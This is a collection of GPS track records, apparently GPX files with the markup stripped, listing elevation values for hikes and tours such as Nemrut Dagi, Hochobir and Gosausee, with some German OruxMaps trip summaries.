+969.54 + + + +977.09 + + + +1019.19 + + + +1085.4 + + + +1129.8 + + + +1149.07 + + + +1161.11 + + + +1174.36 + + + +1172.88 + + + +1153.02 + + + +1141.06 + + + +1162.4 + + + +1175.51 + + + +1196.4 + + + +1215.45 + + + +1226.17 + + + +1254.92 + + + +1293.69 + + + +1321.43 + + + +1390.25 + + + +1430.08 + + + +1460.3 + + + +1477.14 + + + +1522.1 + + + +1559.5 + + + +1608.21 + + + +1622.86 + + + +1632.51 + + + +1641.22 + + + +1643.41 + + + +1660.73 + + + +1682.9 + + + +1696.35 + + + +1705.59 + + + +1723.06 + + + +1738.42 + + + +1766.98 + + + +1777.66 + + + +1781.68 + + + +1777.65 + +" +" + + +2015-10-21 14:56 + + + + + +OruxMaps + + + +2015-10-21 14:56 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 2015-10-21 14:56</h2><br /><p>Startzeit: 10/21/2015 14:56</p><p>Zielzeit: 10/21/2015 16:20</p><p>Strecke: 2,9km (01:24)</p><p>Bewegungszeit: 01:00</p><p>Ø-Geschwindigkeit: 2km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 8,1km/h</p><p>Minimale Höhe: 1979m</p><p>Maximale Höhe: 2741m</p><p>Steig-Geschw.: 112,8m/h</p><p>Sink-Geschw.: -541,9m/h</p><p>Aufstieg: 2m</p><p>Abstieg: -626m</p><p>Steigzeit: 00:01</p><p>Sinkzeit: 01:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2741.33 + + + +2709.62 + + + +2660.37 + + + +2655.23 + + + +2617.18 + + + +2571.18 + + + +2545.21 + + + +2528.36 + + + +2513.21 + + + +2509.58 + + + +2496.24 + + + +2492.21 + + + +2474.61 + + + +2443.11 + + + +2431.62 + + + +2390.21 + + + +2372.72 + + + +2365.71 + + + +2349.1 + + + +2334.86 + + + +2283.23 + + + +2148.22 + + + +2135.63 + + + +2110.83 + + + +2100.34 + + + +2088.69 + + + +2060.66 + + + +2047.33 + + + +1998.39 + + + +1988.61 + + + +1979.71 + +" +" + + + + + + +Garmin International + + +2015-07-21 12:30:38 + + + + + + +2018.41 + + + +2017.05 + + + +2045.26 + + + +2063.4 + + + +2072.05 + + + +2070.51 + + + +2063.29 + + + +2042.64 + + + +2013.84 + + + +2053.25 + + + +2062.0 + + + +2072.21 + + + +2078.61 + + + +2083.75 + + + +2091.93 + + + +2107.62 + + + +2111.93 + + + +2132.65 + + + +2144.54 + + + +2169.75 + + + +2185.0 + + + +2196.95 + + + +2207.75 + + + +2215.25 + + + +2217.31 + + + +2204.29 + + + +2190.42 + + + +2184.33 + + + +2176.4 + + + +2153.03 + + + +2147.69 + + + +2135.86 + + + +2161.55 + + + +2152.41 + + + +2159.94 + + + +2188.9 + + + +2188.4 + + + +2193.91 + + + +2193.54 + + + +2168.48 + + + +2160.13 + + + +2158.63 + + + +2164.61 + + + +2136.42 + + + +2158.91 + + + +2165.64 + + + +2177.49 + + + +2178.36 + + + +2187.97 + + + +2201.98 + + + +2214.58 + + + +2216.51 + + + +2221.44 + + + +2217.55 + + + +2181.69 + + + +2152.6 + + + +2135.24 + + + +2115.16 + + + +2078.9 + + + +2066.21 + + + +2057.85 + + + +2053.83 + + + +2027.15 + + + +2003.97 + + + +1998.34 + + + +1997.17 + + + +1999.0 + + + +2003.94 + + + +2006.24 + + + +2007.6 + + + +2009.3 + + + +2009.7 + + + +2012.34 + + + +2012.21 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +1283.0 + + + +1285.0 + + + +1302.0 + + + +1352.0 + + + +1373.0 + + + +1383.0 + + + +1398.0 + + + +1445.0 + + + +1466.0 + + + +1490.0 + + + +1497.0 + + + +1525.0 + + + +1551.0 + + + +1575.0 + + + +1663.0 + + + +1693.0 + + + +1713.0 + + + +1745.0 + + + +1747.0 + + + +1800.0 + + + +1798.0 + + + +1826.0 + + + +1848.0 + + + +1854.0 + + + +1862.0 + + + +1877.0 + + + +1891.0 + + + +1915.0 + + + +1925.0 + + + +1929.0 + + + +1944.0 + + + +1947.0 + + + +1970.0 + + + +1973.0 + + + +2063.0 + + + +2065.0 + + + +2086.0 + + + +2111.0 + + + +2137.0 + + + +2160.0 + + + +2191.0 + + + +2205.0 + + + +2269.0 + + + +2281.0 + + + +2304.0 + + + +2305.0 + + + +2311.0 + +" +" + + +Arita-Tour + +fuemm63 + +fuemm63 on GPSies.com +GPSiesUserOnWeb + + +Arita-Tour on GPSies.com +trackOnWeb + + +one-way trip +90.0 +5461.431078675756 +58.0 +138.0 +57.0 + +Arita-Tour on GPSies.com + +trackOnWeb + + +63.0 + + + +63.0 + + + +63.0 + + + +60.0 + + + +58.0 + + + +68.0 + + + +69.0 + + + +70.0 + + + +66.0 + + + +65.0 + + + +65.0 + + + +71.0 + + + +71.0 + + + +71.0 + + + +71.0 + + + +82.0 + + + +98.0 + + + +100.0 + + + +93.0 + + + +83.0 + + + +79.0 + + + +79.0 + + + +79.0 + + + +83.0 + + + +82.0 + + + +86.0 + + + +87.0 + + + +92.0 + + + +96.0 + + + +97.0 + + + +96.0 + + + +102.0 + + + +104.0 + + + +110.0 + + + +107.0 + + + +111.0 + + + +119.0 + + + +124.0 + + + +138.0 + + + +137.0 + + + +133.0 + + + +135.0 + + + +129.0 + + + +118.0 + + + +107.0 + + + +104.0 + + + +104.0 + + + +111.0 + + + +101.0 + + + +99.0 + + + +96.0 + +" +" + + + + + + +Garmin International + + + +2015-04-22 14:06:51 + + + + + + +1243.12 + + + +1242.64 + + + +1243.6 + + + +1246.49 + + + +1241.2 + + + +1234.47 + + + +1231.11 + + + +1221.49 + + + +1202.75 + + + +1188.81 + + + +1183.52 + + + +1175.83 + + + +1148.91 + + + +1135.94 + + + +1136.42 + + + +1122.0 + + + +1114.79 + + + +1100.85 + + + +1088.83 + + + +1083.06 + + + +1072.49 + + + +1065.28 + + + +1064.8 + + + +1065.28 + + + +1064.8 + + + +1046.53 + + + +1040.28 + + + +1027.79 + + + +1009.04 + + + +1002.79 + + + +993.18 + + + +985.97 + + + +976.84 + + + +957.61 + + + +946.56 + + + +934.06 + + + +932.14 + + + +917.72 + + + +908.58 + + + +892.72 + + + +879.26 + + + +867.73 + + + +858.59 + + + +855.71 + + + +851.87 + + + +851.87 + + + +848.98 + + + +844.66 + + + +839.37 + + + +833.12 + + + +831.68 + + + +829.27 + + + +825.91 + + + +816.3 + + + +813.41 + + + +807.16 + + + +801.88 + + + +801.4 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Download GPS-Track-Analyse + + + +Unbenannt-Erweitert + + + +0.0 + + + +49.0 + + + +47.0 + + + +51.0 + + + +48.0 + + + +48.0 + + + +48.0 + + + +48.0 + + + +46.0 + + + +47.0 + + + +52.0 + + + +55.0 + + + +45.0 + + + +46.0 + + + +47.0 + + + +45.0 + + + +51.0 + + + +52.0 + + + +55.0 + + + +53.0 + + + +51.0 + + + +42.0 + + + +46.0 + + + +48.0 + + + +53.0 + + + +55.0 + + + +54.0 + + + +54.0 + + + +49.0 + + + +49.0 + + + +48.0 + + + +48.0 + + + +48.0 + + + +49.0 + + + +48.0 + + + +48.0 + + + +49.0 + + + +52.0 + + + +55.0 + + + +56.0 + + + +46.0 + + + +51.0 + + + +55.0 + + + +54.0 + + + +52.0 + + + +52.0 + + + +51.0 + + + +52.0 + + + +54.0 + + + +53.0 + + + +60.0 + + + +55.0 + + + +0.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +SAC Jahresbot 2018 3. Version + + + + + + +SAC Jahresbot 2018 3. Version + + + +731.3 + + +729.6700000000001 + + +725.27 + + +724.75 + + +720.35 + + +719.5500000000001 + + +718.6 + + +717.33 + + +716.4200000000001 + + +716.4 + + +714.38 + + +713.33 + + +712.6199999999999 + + +711.28 + + +709.6899999999999 + + +708.3499999999998 + + +705.1199999999999 + + +704.06 + + +703.24 + + +701.49 + + +700.3000000000001 + + +699.1000000000001 + + +697.6900000000002 + + +696.77 + + +694.5500000000001 + + +692.5100000000001 + + +692.7100000000002 + + +690.1400000000002 + + +688.78 + + +687.63 + + +685.58 + + +685.4300000000001 + + +686.07 + + +682.63 + + +681.23 + + +679.8500000000001 + + +676.5600000000001 + + +671.5 + + +673.8 + + +675.2099999999999 + + +673.08 + + +669.5 + + +670.18 + + +670.4699999999999 + + +667.29 + + +665.35 + + +660.65 + + +659.0 + + +658.0 + + +655.6300000000001 + + +654.9100000000002 + + +649.84 + + +649.75 + + +646.45 + + +642.7200000000003 + + +643.1700000000004 + + +641.7600000000003 + + +639.8700000000003 + + +638.6000000000001 + + +638.5400000000001 + + +634.0000000000002 + + +632.5500000000003 + + +633.4700000000001 + + +631.4800000000001 + + +631.8000000000002 + + +631.3400000000001 +" +" + + + + + + + + +24H Monte Prealba + + + +617.8 + + + +631.2 + + + +642.8 + + + +650.2 + + + +662.0 + + + +665.2 + + + +680.0 + + + +699.6 + + + +713.0 + + + +722.0 + + + +729.6 + + + +733.0 + + + +743.4 + + + +772.2 + + + +782.8 + + + +795.2 + + + +804.0 + + + +814.0 + + + +819.4 + + + +841.4 + + + +854.8 + + + +859.4 + + + +861.2 + + + +891.6 + + + +900.2 + + + +929.4 + + + +959.8 + + + +984.4 + + + +1003.2 + + + +1029.8 + + + +1050.6 + + + +1066.2 + + + +1086.4 + + + +1096.8 + + + +1119.8 + + + +1133.2 + + + +1122.2 + + + +1105.2 + + + +1087.8 + + + +1084.6 + + + +1067.8 + + + +1047.8 + + + +1029.0 + + + +1015.8 + + + +1004.0 + + + +981.4 + + + +960.8 + + + +948.0 + + + +924.4 + + + +915.4 + + + +883.0 + + + +870.2 + + + +855.4 + + + +841.4 + + + +814.8 + + + +817.0 + + + +814.4 + + + +807.8 + + + +797.6 + + + +774.4 + + + +748.4 + + + +735.0 + + + +729.0 + + + +725.2 + + + +720.2 + + + +702.2 + + + +686.8 + + + +669.6 + + + +665.0 + + + +653.0 + + + +645.8 + + + +639.6 + + + +632.8 + + + +620.2 + +" +" + + + + + + +Garmin International + + + +2015-02-26 14:29:39 + + + + + + +752.85 + + + +808.61 + + + +811.49 + + + +822.06 + + + +827.83 + + + +839.37 + + + +854.75 + + + +866.29 + + + +873.5 + + + +896.09 + + + +911.95 + + + +913.39 + + + +916.75 + + + +922.52 + + + +928.77 + + + +940.31 + + + +946.07 + + + +951.36 + + + +978.76 + + + +984.53 + + + +1007.12 + + + +1048.45 + + + +1134.49 + + + +1153.72 + + + +1160.93 + + + +1162.37 + + + +1171.5 + + + +1171.98 + + + +1171.5 + + + +1160.93 + + + +1139.78 + + + +1120.07 + + + +1100.85 + + + +1076.33 + + + +1070.08 + + + +1018.65 + + + +997.51 + + + +993.66 + + + +991.26 + + + +989.33 + + + +971.55 + + + +951.36 + + + +947.04 + + + +937.9 + + + +920.12 + + + +901.85 + + + +896.09 + + + +881.19 + + + +880.22 + + + +874.94 + + + +863.88 + + + +852.35 + + + +847.06 + + + +835.52 + + + +825.91 + + + +821.1 + + + +820.14 + +" +" + + + + + + +CompeGPS TEAM, SL + + + +Aufstiegstrack Hochobir + + + +1555.4 + + +5 + + + + +1566.8 + + +5 + + + + +1575.0 + + +4 + + + + +1598.2 + + +5 + + + + +1616.2 + + +5 + + + + +1637.1 + + +5 + + + + +1647.9 + + +5 + + + + +1668.0 + + +3 + + + + +1686.0 + + +4 + + + + +1700.4 + + +5 + + + + +1728.7 + + +5 + + + + +1739.7 + + +5 + + + + +1755.2 + + +5 + + + + +1768.0 + + +4 + + + + +1783.9 + + +5 + + + + +1794.3 + + +5 + + + + +1803.3 + + +5 + + + + +1833.4 + + +6 + + + + +1828.6 + + +8 + + + + +1861.0 + + +8 + + + + +1895.6 + + +7 + + + + +1972.3 + + +7 + + + + +2016.1 + + +7 + + + + +2012.7 + + +9 + + + + +2026.6 + + +7 + + + + +2045.9 + + +8 + + + + +2061.1 + + +8 + + + + +2099.3 + + +7 + + + + +2077.5 + + +9 + + + " +" + + + + + + +Garmin International + + + +Gasthof Gosausee bis Gasthof Gosausee + + + + + +927.23828125 + +Gasthof Gosausee +Gasthof Gosausee +Gasthof Gosausee + +Waypoint + + + + +1984.546875 + +Steiglpass (2018m) +Steiglpass (2018m) +Steiglpass (2018m) + +Waypoint + + + + +1699.11328125 + +Hofpürglhütte +Hofpürglhütte +Hofpürglhütte + +Waypoint + + + + +1440.64453125 + +Theodor-Körner-Hütte(1466m) +Theodor-Körner-Hütte(1466m) +Theodor-Körner-Hütte(1466m) + +Waypoint + + + + +927.23828125 + +Gasthof Gosausee +Gasthof Gosausee +Gasthof Gosausee + +Waypoint + + + " +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +622.0 + + + +620.0 + + + +641.0 + + + +634.0 + + + +636.0 + + + +648.0 + + + +652.0 + + + +687.0 + + + +709.0 + + + +717.0 + + + +725.0 + + + +737.0 + + + +752.0 + + + +778.0 + + + +781.0 + + + +791.0 + + + +793.0 + + + +813.0 + + + +839.0 + + + +867.0 + + + +910.0 + + + +944.0 + + + +971.0 + + + +984.0 + + + +992.0 + + + +1024.0 + + + +1043.0 + + + +1040.0 + + + +1071.0 + + + +1094.0 + + + +1105.0 + + + +1153.0 + + + +1165.0 + + + +1175.0 + + + +1187.0 + + + +1200.0 + + + +1212.0 + + + +1219.0 + + + +1243.0 + + + +1265.0 + + + +1279.0 + + + +1304.0 + + + +1316.0 + + + +1342.0 + + + +1352.0 + + + +1367.0 + + + +1364.0 + + + +1370.0 + + + +1401.0 + + + +1405.0 + + + +1452.0 + + + +1464.0 + + + +1510.0 + + + +1540.0 + + + +1561.0 + + + +1616.0 + + + +1615.0 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + +1360.0 + + + +1372.0 + + + +1391.0 + + + +1422.0 + + + +1482.0 + + + +1493.0 + + + +1506.0 + + + +1517.0 + + + +1520.0 + + + +1542.0 + + + +1559.0 + + + +1567.0 + + + +1580.0 + + + +1606.0 + + + +1711.0 + + + +1716.0 + + + +1733.0 + + + +1777.0 + + + +1787.0 + + + +1792.0 + + + +1803.0 + + + +1823.0 + + + +1828.0 + + + +1870.0 + + + +1890.0 + + + +1907.0 + + + +1947.0 + + + +1999.0 + + + +2041.0 + + + +2068.0 + + + +2092.0 + + + +2159.0 + + + +2205.0 + + + +2213.0 + + + +2248.0 + + + +2249.0 + + + +2250.0 + + + +2299.0 + + + +2282.0 + + + +2328.0 + + + +2282.0 + + + +2302.0 + + + +2247.0 + + + +2249.0 + + + +2248.0 + + + +2214.0 + + + +2208.0 + + + +2160.0 + + + +2192.0 + + + +2184.0 + + + +2145.0 + + + +2138.0 + + + +2144.0 + + + +2170.0 + + + +2190.0 + + + +2178.0 + + + +2159.0 + + + +2129.0 + + + +2090.0 + + + +2095.0 + + + +2121.0 + + + +2112.0 + + + +2078.0 + + + +2011.0 + + + +1967.0 + + + +1945.0 + + + +1931.0 + + + +1916.0 + + + +1904.0 + + + +1898.0 + + + +1902.0 + + + +1896.0 + + + +1900.0 + + + +1904.0 + + + +1914.0 + + + +1908.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +03-APR-16 14:56:47 + + + + + +396.2 + + + +403.41 + + + +407.26 + + + +409.66 + + + +430.81 + + + +435.61 + + + +438.02 + + + +435.61 + + + +436.1 + + + +443.79 + + + +404.85 + + + +405.81 + + + +403.41 + + + +400.05 + + + +410.62 + + + +412.06 + + + +415.43 + + + +410.62 + + + +414.47 + + + +415.43 + + + +413.98 + + + +414.47 + + + +415.43 + + + +420.71 + + + +423.6 + + + +429.37 + + + +441.38 + + + +461.09 + + + +489.45 + + + +544.24 + + + +549.53 + + + +550.97 + + + +552.41 + + + +553.38 + + + +563.47 + + + +572.12 + + + +542.8 + + + +531.27 + + + +500.02 + + + +476.95 + + + +467.34 + + + +462.05 + + + +459.17 + + + +446.19 + + + +436.58 + + + +428.89 + + + +419.75 + + + +418.79 + + + +418.79 + + + +417.83 + + + +411.1 + + + +412.54 + + + +412.06 + + + +408.7 + + + +407.74 + + + +405.81 + + + +406.29 + + + +409.18 + + + +406.29 + + + +404.85 + + + +404.37 + + + +403.89 + + + +414.47 + + + +414.95 + + + +413.5 + + + +416.87 + + + +414.47 + + + +422.16 + + + +424.56 + + + +425.52 + +" +" + + +Carl Hirnbein Weg + +Andreas Kögel - Community + + + + + +Carl Hirnbein Weg + + + +894.4 + + +917.7 + + +922.4 + + +927.3 + + +909.5 + + +898.7 + + +900.2 + + +902.2 + + +907.7 + + +909.4 + + +918.6 + + +932.6 + + +934.0 + + +936.9 + + +949.3 + + +954.1 + + +956.4 + + +965.7 + + +962.5 + + +956.8 + + +957.1 + + +937.8 + + +940.5 + + +947.2 + + +957.2 + + +955.6 + + +957.0 + + +957.2 + + +953.9 + + +936.8 + + +900.0 + + +889.6 + + +886.8 + + +880.3 + + +870.2 + + +860.3 + + +836.1 + + +829.3 + + +826.4 + + +824.2 + + +827.2 + + +829.3 + + +842.9 + + +846.4 + + +848.8 + + +850.0 + + +849.2 + + +849.5 + + +855.33825 + + +852.47279 + + +849.63462 + + +871.15424 + + +861.3 + + +854.6 + + +856.0 + + +858.4 + + +860.8 + + +862.9 + + +872.3 + + +880.5 + + +877.9 + + +883.8 + + +892.5 + + +898.8 + + +898.7 + + +896.7 + + +898.7 + + +909.5 + + +927.3 + + +922.4 + + +917.7 + + +894.4 +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +1032.0 + + + +1041.0 + + + +1045.0 + + + +1055.0 + + + +1060.0 + + + +1071.0 + + + +1079.0 + + + +1094.0 + + + +1098.0 + + + +1099.0 + + + +1120.0 + + + +1146.0 + + + +1163.0 + + + +1176.0 + + + +1193.0 + + + +1207.0 + + + +1225.0 + + + +1229.0 + + + +1239.0 + + + +1237.0 + + + +1237.0 + + + +1257.0 + + + +1289.0 + + + +1295.0 + + + +1289.0 + + + +1299.0 + + + +1305.0 + + + +1340.0 + + + +1320.0 + + + +1342.0 + + + +1367.0 + + + +1385.0 + + + +1388.0 + + + +1412.0 + + + +1411.0 + + + +1413.0 + + + +1423.0 + + + +1432.0 + + + +1444.0 + + + +1453.0 + + + +1445.0 + + + +1467.0 + + + +1462.0 + + + +1462.0 + + + +1469.0 + + + +1480.0 + + + +1493.0 + + + +1497.0 + + + +1508.0 + + + +1507.0 + + + +1503.0 + + + +1494.0 + + + +1529.0 + + + +1538.0 + + + +1538.0 + + + +1546.0 + + + +1534.0 + + + +1483.0 + + + +1512.0 + + + +1524.0 + + + +1496.0 + + + +1522.0 + + + +1491.0 + + + +1489.0 + +" +" + + + + + + +GPS dump for www.flightlog.org + + + +Track 001 + + + +1029.7 + + + +1025.8 + + + +1030.6 + + + +1024.9 + + + +1028.2 + + + +1037.4 + + + +1037.8 + + + +1044.6 + + + +1049.9 + + + +1065.2 + + + +1082.5 + + + +1087.8 + + + +1091.7 + + + +1104.2 + + + +1134.0 + + + +1134.0 + + + +1163.8 + + + +1200.3 + + + +1241.2 + + + +1264.7 + + + +1295.9 + + + +1308.0 + + + +1386.3 + + + +1406.0 + + + +1447.4 + + + +1469.9 + + + +1494.5 + + + +1525.7 + + + +1519.5 + + + +1538.7 + + + +1545.9 + + + +1558.9 + + + +1571.8 + + + +1610.3 + + + +1650.2 + + + +1656.0 + + + +1674.2 + + + +1695.4 + + + +1726.6 + + + +1740.6 + + + +1764.6 + + + +1771.8 + + + +1832.8 + + + +1886.7 + + + +1909.8 + + + +1930.9 + + + +2016.9 + + + +2041.5 + + + +2044.3 + + + +2060.7 + + + +2087.1 + + + +2091.9 + + + +2096.7 + + + +2115.0 + + + +2133.7 + + + +2156.8 + + + +2195.3 + + + +2219.8 + +" +" + + +Nemrut Dagi + + + + + +OruxMaps + + + +Nemrut Dagi +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Nemrut Dagi</h2><br /><p>Startzeit: 09/18/2017 10:30</p><p>Zielzeit: 09/18/2017 12:08</p><p>Strecke: 4,3km (01:37)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 2,7km/h</p><p>Netto-Geschwindigkeit: 3,6km/h</p><p>Max. Geschwindigkeit: 7,2km/h</p><p>Minimale Höhe: 2427m</p><p>Maximale Höhe: 2939m</p><p>Steig-Geschw.: 418,3m/h</p><p>Sink-Geschw.: -689,3m/h</p><p>Aufstieg: 575m</p><p>Abstieg: -78m</p><p>Steigzeit: 01:22</p><p>Sinkzeit: 00:06</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2433.63 + + + +2431.63 + + + +2428.14 + + + +2451.05 + + + +2448.26 + + + +2464.85 + + + +2471.63 + + + +2472.63 + + + +2474.03 + + + +2470.55 + + + +2488.62 + + + +2485.76 + + + +2486.69 + + + +2501.13 + + + +2536.73 + + + +2596.48 + + + +2624.63 + + + +2632.01 + + + +2640.64 + + + +2643.14 + + + +2664.66 + + + +2666.98 + + + +2676.59 + + + +2685.57 + + + +2692.54 + + + +2709.65 + + + +2739.51 + + + +2739.03 + + + +2757.13 + + + +2776.57 + + + +2787.54 + + + +2795.6 + + + +2805.14 + + + +2812.51 + + + +2809.48 + + + +2837.85 + + + +2846.19 + + + +2796.11 + + + +2864.84 + + + +2881.88 + + + +2902.09 + + + +2921.63 + + + +2925.48 + +" +" + + +Tourenplanung am 22. Juli 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 22. Juli 2016 + + + +261.1 + + +262.2 + + +262.7 + + +265.0 + + +266.6 + + +268.2 + + +273.4 + + +276.6 + + +279.3 + + +282.2 + + +268.0 + + +268.6 + + +265.9 + + +276.3 + + +276.5 + + +279.4 + + +280.0 + + +283.8 + + +280.1 + + +285.3 + + +288.5 + + +291.1 + + +290.5 + + +293.8 + + +308.4 + + +307.2 + + +306.6 + + +314.9 + + +309.6 + + +298.0 + + +294.7 + + +281.4 + + +279.3 + + +276.6 + + +273.4 + + +268.2 + + +266.6 + + +265.0 + + +262.7 + + +262.2 + + +261.1 +" +" + + +Obri Hrad + +dodovogel + +dodovogel on GPSies.com +GPSiesUserOnWeb + + +Obri Hrad on GPSies.com +trackOnWeb + + +round trip +214.0 +4201.899631769187 +871.0 +1014.0 +215.0 + +Obri Hrad on GPSies.com + +trackOnWeb + + +872.0 + + + +871.0 + + + +883.0 + + + +904.0 + + + +921.0 + + + +941.0 + + + +958.0 + + + +972.0 + + + +983.0 + + + +987.0 + + + +989.0 + + + +997.0 + + + +1008.0 + + + +1009.0 + + + +1014.0 + + + +1010.0 + + + +1006.0 + + + +975.0 + + + +972.0 + + + +968.0 + + + +961.0 + + + +959.0 + + + +961.0 + + + +963.0 + + + +981.0 + + + +996.0 + + + +992.0 + + + +996.0 + + + +988.0 + + + +985.0 + + + +983.0 + + + +982.0 + + + +981.0 + + + +981.0 + + + +976.0 + + + +982.0 + + + +984.0 + + + +984.0 + + + +980.0 + + + +976.0 + + + +981.0 + + + +980.0 + + + +975.0 + + + +972.0 + + + +969.0 + + + +955.0 + + + +931.0 + + + +939.0 + + + +942.0 + + + +969.0 + + + +975.0 + + + +980.0 + + + +983.0 + + + +985.0 + + + +988.0 + + + +996.0 + + + +992.0 + + + +966.0 + + + +941.0 + + + +921.0 + + + +903.0 + + + +883.0 + + + +871.0 + +" +" + + +Tourenplanung am 19. Juli 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 19. Juli 2016 + + + +275.89325 + + +274.00907 + + +273.30034 + + +273.91532 + + +273.51162 + + +274.47306 + + +273.74806 + + +272.20395 + + +268.77886 + + +266.78968 + + +266.04337 + + +261.41767 + + +258.31382 + + +261.17962 + + +263.43049 + + +261.34292 + + +262.14787 + + +259.07485 + + +265.41571 + + +261.96979 + + +265.16687 + + +261.93601 + + +261.00921 + + +264.86304 + + +260.60539 + + +253.97716 + + +257.71395 + + +259.26019 + + +262.04642 + + +265.1275 + + +268.10227 + + +271.36584 + + +274.20589 + + +272.80127 + + +276.34288 + + +272.64178 + + +273.71022 +" +" + + + + + + +Garmin International + + + +susten + + + + + + +1524.04 + + + +1524.38 + + + +1526.03 + + + +1527.04 + + + +1546.25 + + + +1557.01 + + + +1570.52 + + + +1577.94 + + + +1604.29 + + + +1622.4 + + + +1626.01 + + + +1648.99 + + + +1657.64 + + + +1700.26 + + + +1713.34 + + + +1734.89 + + + +1751.44 + + + +1801.61 + + + +1833.44 + + + +1841.77 + + + +1845.28 + + + +1844.96 + + + +1841.66 + + + +1854.24 + + + +1860.35 + + + +1867.25 + + + +1878.42 + + + +1895.31 + + + +1897.01 + + + +1944.24 + + + +2004.14 + + + +2024.3 + + + +2038.01 + + + +2054.5 + + + +2068.59 + + + +2080.05 + + + +2099.04 + + + +2101.16 + + + +2096.86 + + + +2094.49 + + + +2097.19 + + + +2098.01 + + + +2099.04 + + + +2084.1 + + + +2053.65 + + + +2037.7 + + + +1986.66 + + + +1940.59 + + + +1908.21 + + + +1890.38 + + + +1885.97 + + + +1874.7 + + + +1872.24 + + + +1860.11 + + + +1855.94 + + + +1853.89 + + + +1838.29 + + + +1819.87 + + + +1782.79 + + + +1777.77 + + + +1772.67 + + + +1764.93 + + + +1741.59 + + + +1721.88 + + + +1707.18 + + + +1668.64 + + + +1628.5 + + + +1619.65 + + + +1606.19 + + + +1590.94 + + + +1584.22 + + + +1568.51 + + + +1547.84 + +" +" + + + + + + +Garmin International + + + +2014-08-14 15:35:40 + + + + + + +2313.55 + + + +2384.21 + + + +2435.64 + + + +2449.58 + + + +2451.98 + + + +2463.04 + + + +2525.04 + + + +2534.17 + + + +2577.43 + + + +2627.42 + + + +2628.86 + + + +2640.88 + + + +2686.54 + + + +2730.76 + + + +2752.39 + + + +2775.94 + + + +2788.92 + + + +2801.42 + + + +2830.74 + + + +2837.95 + + + +2850.93 + + + +2858.62 + + + +2875.92 + + + +2887.46 + + + +2892.74 + + + +2905.72 + + + +2938.41 + + + +2973.98 + + + +3010.99 + + + +2975.9 + + + +2932.64 + + + +2903.8 + + + +2889.86 + + + +2863.9 + + + +2845.64 + + + +2838.91 + + + +2837.47 + + + +2833.14 + + + +2833.14 + + + +2803.82 + + + +2786.52 + + + +2781.23 + + + +2740.86 + + + +2722.11 + + + +2705.29 + + + +2692.79 + + + +2658.18 + + + +2601.46 + + + +2555.8 + + + +2548.59 + + + +2496.2 + + + +2488.03 + + + +2482.74 + + + +2437.56 + + + +2395.26 + + + +2330.85 + + + +2317.88 + + + +2314.99 + +" +" + + +schibegütsch 2014-03 + + + + + + +schibegütsch 2014-03 + + + +1317.0000079020374 + + +1322.3999708813362 + + +1333.1999421252224 + + +1340.2999316864898 + + +1356.1001373706088 + + +1394.6000346283342 + + +1400.7402090963517 + + +1405.1136657979207 + + +1407.1999559943145 + + +1403.5999280697654 + + +1386.899967892372 + + +1385.2999993038052 + + +1371.4999379922135 + + +1367.1000044529885 + + +1367.399998409914 + + +1365.1000001907805 + + +1373.4000428064664 + + +1377.9000588540864 + + +1392.1000912245966 + + +1461.5000589231813 + + +1481.4000553023536 + + +1505.4000138362755 + + +1507.8000514347145 + + +1516.6000295181225 + + +1533.3000654803266 + + +1578.3999499712777 + + +1585.4852625514743 + + +1593.599950365224 + + +1623.3000535636545 + + +1693.4999993418035 + + +1727.7999451336802 + + +1761.7 + + +1780.4 + + +1804.2001517080862 + + +1834.2001382306178 + + +1847.800321775573 + + +1881.5002156112241 + + +1932.7001835067156 + + +1966.0001244667933 + + +1997.6002476738693 + + +2022.4 + + +2002.4001780847566 + + +1960.9002034803814 + + +1937.7001827073345 + + +1891.2001818367296 + + +1846.2003037700385 + + +1815.1001441575768 + + +1760.6999979361585 + + +1727.799945133718 + + +1693.4999993872068 + + +1623.3000535636545 + + +1593.599950365224 + + +1585.1953527458984 + + +1578.3999499712777 + + +1533.300065480084 + + +1516.6000295181225 + + +1507.3999807809587 + + +1505.5 + + +1502.299983587986 + + +1482.899989091279 + + +1464.599959634165 + + +1447.3001084177058 + + +1391.9000879527061 + + +1379.6000634557968 + + +1371.1000554926359 + + +1365.0000006124992 + + +1366.8 + + +1367.2999982588633 + + +1366.8000089050886 + + +1365.6000075377926 + + +1372.899949178663 + + +1372.239552822343 + + +1363.400065947279 + + +1361.0000345790086 + + +1360.8000015677958 + + +1359.9728030862416 + + +1359.3999977457386 + + +1351.20003160952 + + +1333.1999421252224 + + +1322.3999708813362 + + +1317.0000079020374 +" +" + + + + + + +Garmin International + + + +vaumuse +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: vaumuse</h2><br /><p>Startzeit: 04/05/2018 10:08</p><p>Zielzeit: 04/05/2018 12:08</p><p>Strecke: 5,6km (02:00)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 2,8km/h</p><p>Netto-Geschwindigkeit: 3,9km/h</p><p>Max. Geschwindigkeit: 7,3km/h</p><p>Minimale Höhe: 831m</p><p>Maximale Höhe: 1422m</p><p>Steig-Geschw.: 391,7m/h</p><p>Sink-Geschw.: -345,8m/h</p><p>Aufstieg: 625m</p><p>Abstieg: 